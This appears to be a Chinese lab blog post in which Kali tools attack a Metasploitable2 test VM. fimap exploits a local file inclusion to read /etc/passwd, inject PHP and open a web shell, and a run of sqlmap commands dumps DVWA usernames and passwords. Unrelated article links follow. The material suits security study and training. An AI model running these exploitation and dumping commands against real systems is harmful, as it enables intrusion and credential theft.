使用Fimap和metasploitable2文件包含漏洞测试

fimap

首先查看msf已经存在的漏洞:





root@kali:~# fimap -u 'http://192.168.136.130/lfi.php?page=index.php' --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 'http://192.168.136.130/lfi.php?page=index.php'

[05:57:09] [OUT] Inspecting URL 'http://192.168.136.130/lfi.php?page=index.php'...

[05:57:09] [INFO] Fiddling around with URL...

[05:57:09] [OUT] [PHP] Possible file inclusion found! -> 'http://192.168.136.130/lfi.php?page=IzIjx0Ao' with Parameter 'page'.

[05:57:09] [OUT] [PHP] Identifying Vulnerability 'http://192.168.136.130/lfi.php?page=index.php' with Parameter 'page'...

[05:57:09] [INFO] Scriptpath received: '/var/www'

[05:57:09] [INFO] Operating System is 'Unix-Like'.

[05:57:09] [INFO] Testing file '/etc/passwd'...

[05:57:09] [INFO] Testing file '/proc/self/environ'...

[05:57:09] [INFO] Testing file 'php://input'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access.log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access.log'...

[05:57:09] [INFO] Testing file '/var/log/apache2/access_log'...

[05:57:09] [INFO] Testing file '/var/log/apache/access_log'...

[05:57:09] [INFO] Testing file '/var/log/httpd/access_log'...

[05:57:09] [INFO] Testing file '/apache/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache/logs/access_log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access.log'...

[05:57:09] [INFO] Testing file '/apache2/logs/access_log'...

[05:57:09] [INFO] Testing file '/etc/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/etc/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/httpd/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/www/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache/logs/access.log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access_log'...

[05:57:10] [INFO] Testing file '/usr/local/apache2/logs/access.log'...

[05:57:10] [INFO] Testing file '/var/log/access_log'...

[05:57:10] [INFO] Testing file '/var/log/access.log'...

[05:57:10] [INFO] Testing file '/logs/access.log'...

[05:57:10] [INFO] Testing file '/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/opt/lampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access.log'...

[05:57:10] [INFO] Testing file '/opt/xampp/logs/access_log'...

[05:57:10] [INFO] Testing file '/var/log/auth.log'...

[05:57:10] [INFO] Testing file '/var/log/secure'...

[05:57:10] [INFO] Testing file 'http://www.tha-imax.de/fimap_testfiles/test'...

##################################################################

#[1] Possible PHP-File Inclusion                                 #

##################################################################

#::REQUEST                                                       #

#  [URL]        http://192.168.136.130/lfi.php?page=index.php    #

#  [HEAD SENT]                                                   #

#::VULN INFO                                                     #

#  [GET PARAM]  page                                             #

#  [PATH]       /var/www                                         #

#  [OS]         Unix                                             #

#  [TYPE]       Absolute Clean                                   #

#  [TRUNCATION] No Need. It's clean.                             #

#  [READABLE FILES]                                              #

#                   [0] /etc/passwd                              #

#                   [1] /proc/self/environ                       #

#                   [2] /var/log/auth.log                        #

##################################################################

root@kali:~# clear

root@kali:~# fimap -x --force-run

fimap v.1.00_svn (My life for Aiur)

:: Automatic LFI/RFI scanner and exploiter

:: by Iman Karim (fimap.dev@gmail.com)

###########################

#:: List of Domains ::    #

###########################

#[1] 192.168.136.130      #

#[q] Quit                 #

###########################

Choose Domain: 1

#####################################################################################################

#:: FI Bugs on '192.168.136.130' ::                                                                 #

#####################################################################################################

#[1] URL: '/lfi.php?page=index.php' injecting file: '/proc/self/environ' using GET-param: 'page'    #

#[2] URL: '/lfi.php?page=index.php' injecting file: '/var/log/auth.log' using GET-param: 'page'     #

#[q] Quit                                                                                           #

#####################################################################################################

Choose vulnerable script: 1

[06:01:09] [INFO] Testing PHP-code injection thru User-Agent...

[06:01:09] [OUT] PHP Injection works! Testing if execution works...

[06:01:09] [INFO] Testing execution thru 'popen[b64]'...

[06:01:09] [OUT] Execution thru 'popen[b64]' works!

####################################################

#:: Available Attacks - PHP and SHELL access ::    #

####################################################

#[1] Spawn fimap shell                             #

#[2] Spawn pentestmonkey's reverse shell           #

#[3] [Test Plugin] Show some info                  #

#[q] Quit                                          #

####################################################

Choose Attack: 1

Please wait - Setting up shell (one request)...

-------------------------------------------

Welcome to fimap shell!

Better don't start interactive commands! ;)

Also remember that this is not a persistent shell.

Every command opens a new shell and quits it after that!

Enter 'q' to exit the shell.

-------------------------------------------

fishell@www-data:/var/www$>

使用sqlmap和metasploitable2进行SQL注入实验

实验环境是kali的sqlmap和metasploit2.
root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low'



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-user



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --current-db



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -dbs



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' -users



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --table -D dvwa



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --column -T users -D dvwa



root@kali:~# sqlmap -u "http://192.168.136.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='PHPSSID=31e286bfcb5f99785b26e2af656da170;sercurity=low' --dump -C user,password -T users -D dvwa

metasploitable实践的更多相关文章

  1. 功防技术与实践第1.2章,kali初步了解

    20169314 2016-2017-2 <网络攻防实践>/<网络攻击与防范>第2周学习总结 一.教材学习内容总结 1.hacker和cracker的区别 网络攻防分三部分:系 ...

  2. webp图片实践之路

    最近,我们在项目中实践了webp图片,并且抽离出了工具模块,整合到了项目的基础模板中.传闻IOS10也将要支持webp,那么使用webp带来的性能提升将更加明显.估计在不久的将来,webp会成为标配. ...

  3. Hangfire项目实践分享

    Hangfire项目实践分享 目录 Hangfire项目实践分享 目录 什么是Hangfire Hangfire基础 基于队列的任务处理(Fire-and-forget jobs) 延迟任务执行(De ...

  4. TDD在Unity3D游戏项目开发中的实践

    0x00 前言 关于TDD测试驱动开发的文章已经有很多了,但是在游戏开发尤其是使用Unity3D开发游戏时,却听不到特别多关于TDD的声音.那么本文就来简单聊一聊TDD如何在U3D项目中使用以及如何使 ...

  5. Logstash实践: 分布式系统的日志监控

    文/赵杰 2015.11.04 1. 前言 服务端日志你有多重视? 我们没有日志 有日志,但基本不去控制需要输出的内容 经常微调日志,只输出我们想看和有用的 经常监控日志,一方面帮助日志微调,一方面及 ...

  6. 【大型网站技术实践】初级篇:借助Nginx搭建反向代理服务器

    一.反向代理:Web服务器的“经纪人” 1.1 反向代理初印象 反向代理(Reverse Proxy)方式是指以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从 ...

  7. Windows平台分布式架构实践 - 负载均衡

    概述 最近.NET的世界开始闹腾了,微软官方终于加入到了对.NET跨平台的支持,并且在不久的将来,我们在VS里面写的代码可能就可以通过Mono直接在Linux和Mac上运行.那么大家(开发者和企业)为 ...

  8. Mysql事务探索及其在Django中的实践(二)

    继上一篇<Mysql事务探索及其在Django中的实践(一)>交代完问题的背景和Mysql事务基础后,这一篇主要想介绍一下事务在Django中的使用以及实际应用给我们带来的效率提升. 首先 ...

  9. Mysql事务探索及其在Django中的实践(一)

    前言 很早就有想开始写博客的想法,一方面是对自己近期所学知识的一些总结.沉淀,方便以后对过去的知识进行梳理.追溯,一方面也希望能通过博客来认识更多相同技术圈的朋友.所幸近期通过了博客园的申请,那么今天 ...

随机推荐

  1. LDAP基本概念

    LDAP(Lightweight Directory Access Protocol)是一种基于计算模型的客户机/服务器X.500目录服务访问协议.LDAP是从X.500目录访问协议的基础上发展过来的 ...

  2. string类的简要实现

    #include<iostream> #include<cstring> #include<cstdlib> #include<cstdio> #inc ...

  3. JS 奇淫巧技 转

    1. 在 String.prototype.replace 方法中使用 /g 和 /i 标志位 令很多 JavaScript 初学者意外的是,字符串的 replace 方法并不会 替换所有匹配的子串— ...

  4. [win10]遇坑指南

    好多不好用的地方,现在解决的差不多了,把经验分享一下,也方便自己下一次重装 win10 时不再进坑. 1. 输入法:https://zhidao.baidu.com/question/45942172 ...

  5. [Java.web]JSTL 使用

    <%@ page import="cn.itcast.domain.Person"%> <%@ page language="java" im ...

  6. 阿里云VPS(win系统)装ROS教程

    以下方法是VPS下的WIN系统下安装ROS的方法,LINUX暂时没有 VPS系统装2003或2008 ,建议2008 启动快,安全,但以下内容是在2003上测试的, 2003系统,2003设置开机自动 ...

  7. cookies封装

    /** * @author wxf */var cookie=new function(){ this.set=function(name,value,hours){ var life=new Dat ...

  8. GitHub中README.md文件的编辑和使用

    最近对它的README.md文件颇为感兴趣.便写下这贴,帮助更多的还不会编写README文件的同学们. README文件后缀名为md.md是markdown的缩写,markdown是一种编辑博客的语言 ...

  9. 【HTTP请求】、详解

    一.协议介绍 HTTP(HyperText Transfer Protocol,超文本传输协议)是一套计算机通过网络进行通信的规则,使HTTP客户端能够从HTTP服务器端请求到信息和服务,目前的版本号 ...

  10. java.lang.VerifyError: Inconsistent stackmap frames at branch target 81

    java项目中有如下代码: @RequestMapping(value = "/getMxList") @ResponseBody public Map<String, Ob ...